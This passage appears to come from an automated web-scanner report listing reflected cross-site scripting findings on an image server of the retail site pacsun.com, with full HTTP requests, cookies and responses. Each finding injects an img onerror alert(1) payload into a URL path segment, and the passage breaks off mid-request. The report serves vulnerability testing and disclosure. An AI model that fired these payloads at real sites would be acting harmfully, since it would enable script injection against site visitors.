This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8397788_016863f<img%20src%3da%20onerror%3dalert(1)>762e2322661?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8397788_016863f<img src=a onerror=alert(1)>762e2322661

3.175. http://images3.pacsun.com/is/image/pacsunproducts/8407777_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8407777_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eac13<img%20src%3da%20onerror%3dalert(1)>9cf9d655a9e was submitted in the REST URL parameter 4. This input was echoed as eac13<img src=a onerror=alert(1)>9cf9d655a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8407777_01eac13<img%20src%3da%20onerror%3dalert(1)>9cf9d655a9e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:58 GMT
Connection: close

Unable to find /pacsunproducts/8407777_01eac13<img src=a onerror=alert(1)>9cf9d655a9e

3.176. http://images3.pacsun.com/is/image/pacsunproducts/8411902_01_054 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8411902_01_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7801f<img%20src%3da%20onerror%3dalert(1)>61f7452cf3c was submitted in the REST URL parameter 4. This input was echoed as 7801f<img src=a onerror=alert(1)>61f7452cf3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8411902_01_0547801f<img%20src%3da%20onerror%3dalert(1)>61f7452cf3c?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8411902_01_0547801f<img src=a onerror=alert(1)>61f7452cf3c

3.177. http://images3.pacsun.com/is/image/pacsunproducts/8411902_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8411902_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 947c7<img%20src%3da%20onerror%3dalert(1)>1af0a08797b was submitted in the REST URL parameter 4. This input was echoed as 947c7<img src=a onerror=alert(1)>1af0a08797b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8411902_sw_001947c7<img%20src%3da%20onerror%3dalert(1)>1af0a08797b?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8411902_sw_001947c7<img src=a onerror=alert(1)>1af0a08797b

3.178. http://images3.pacsun.com/is/image/pacsunproducts/8411902_sw_054 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8411902_sw_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1068d<img%20src%3da%20onerror%3dalert(1)>1d595725188 was submitted in the REST URL parameter 4. This input was echoed as 1068d<img src=a onerror=alert(1)>1d595725188 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8411902_sw_0541068d<img%20src%3da%20onerror%3dalert(1)>1d595725188?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8411902_sw_0541068d<img src=a onerror=alert(1)>1d595725188

3.179. http://images3.pacsun.com/is/image/pacsunproducts/8425670_01_041 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8425670_01_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e727<img%20src%3da%20onerror%3dalert(1)>7a30eede312 was submitted in the REST URL parameter 4. This input was echoed as 5e727<img src=a onerror=alert(1)>7a30eede312 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8425670_01_0415e727<img%20src%3da%20onerror%3dalert(1)>7a30eede312?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:44 GMT
Connection: close

Unable to find /pacsunproducts/8425670_01_0415e727<img src=a onerror=alert(1)>7a30eede312

3.180. http://images3.pacsun.com/is/image/pacsunproducts/8426819_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8426819_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9f36<img%20src%3da%20onerror%3dalert(1)>5c1fecab3cd was submitted in the REST URL parameter 4. This input was echoed as a9f36<img src=a onerror=alert(1)>5c1fecab3cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8426819_01a9f36<img%20src%3da%20onerror%3dalert(1)>5c1fecab3cd?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8426819_01a9f36<img src=a onerror=alert(1)>5c1fecab3cd

3.181. http://images3.pacsun.com/is/image/pacsunproducts/8438806_01_025 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8438806_01_025

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7247c<img%20src%3da%20onerror%3dalert(1)>ddc992b41ad was submitted in the REST URL parameter 4. This input was echoed as 7247c<img src=a onerror=alert(1)>ddc992b41ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8438806_01_0257247c<img%20src%3da%20onerror%3dalert(1)>ddc992b41ad?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8438806_01_0257247c<img src=a onerror=alert(1)>ddc992b41ad

3.182. http://images3.pacsun.com/is/image/pacsunproducts/8637464_01_030 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637464_01_030

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90a9c<img%20src%3da%20onerror%3dalert(1)>442113cd0c1 was submitted in the REST URL parameter 4. This input was echoed as 90a9c<img src=a onerror=alert(1)>442113cd0c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637464_01_03090a9c<img%20src%3da%20onerror%3dalert(1)>442113cd0c1?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:45 GMT
Connection: close

Unable to find /pacsunproducts/8637464_01_03090a9c<img src=a onerror=alert(1)>442113cd0c1

3.183. http://images3.pacsun.com/is/image/pacsunproducts/8637464_sw_030 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637464_sw_030

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb28d<img%20src%3da%20onerror%3dalert(1)>55aeca0da2a was submitted in the REST URL parameter 4. This input was echoed as fb28d<img src=a onerror=alert(1)>55aeca0da2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637464_sw_030fb28d<img%20src%3da%20onerror%3dalert(1)>55aeca0da2a?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8637464_sw_030fb28d<img src=a onerror=alert(1)>55aeca0da2a

3.184. http://images3.pacsun.com/is/image/pacsunproducts/8637464_sw_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637464_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcebf<img%20src%3da%20onerror%3dalert(1)>21784df730a was submitted in the REST URL parameter 4. This input was echoed as dcebf<img src=a onerror=alert(1)>21784df730a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637464_sw_040dcebf<img%20src%3da%20onerror%3dalert(1)>21784df730a?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:50 GMT
Connection: close

Unable to find /pacsunproducts/8637464_sw_040dcebf<img src=a onerror=alert(1)>21784df730a

3.185. http://images3.pacsun.com/is/image/pacsunproducts/8637613_01_085 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637613_01_085

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8804<img%20src%3da%20onerror%3dalert(1)>67595dbea58 was submitted in the REST URL parameter 4. This input was echoed as e8804<img src=a onerror=alert(1)>67595dbea58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637613_01_085e8804<img%20src%3da%20onerror%3dalert(1)>67595dbea58?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8637613_01_085e8804<img src=a onerror=alert(1)>67595dbea58

3.186. http://images3.pacsun.com/is/image/pacsunproducts/8643207_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8643207_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79048<img%20src%3da%20onerror%3dalert(1)>749ccefca97 was submitted in the REST URL parameter 4. This input was echoed as 79048<img src=a onerror=alert(1)>749ccefca97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8643207_0179048<img%20src%3da%20onerror%3dalert(1)>749ccefca97?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
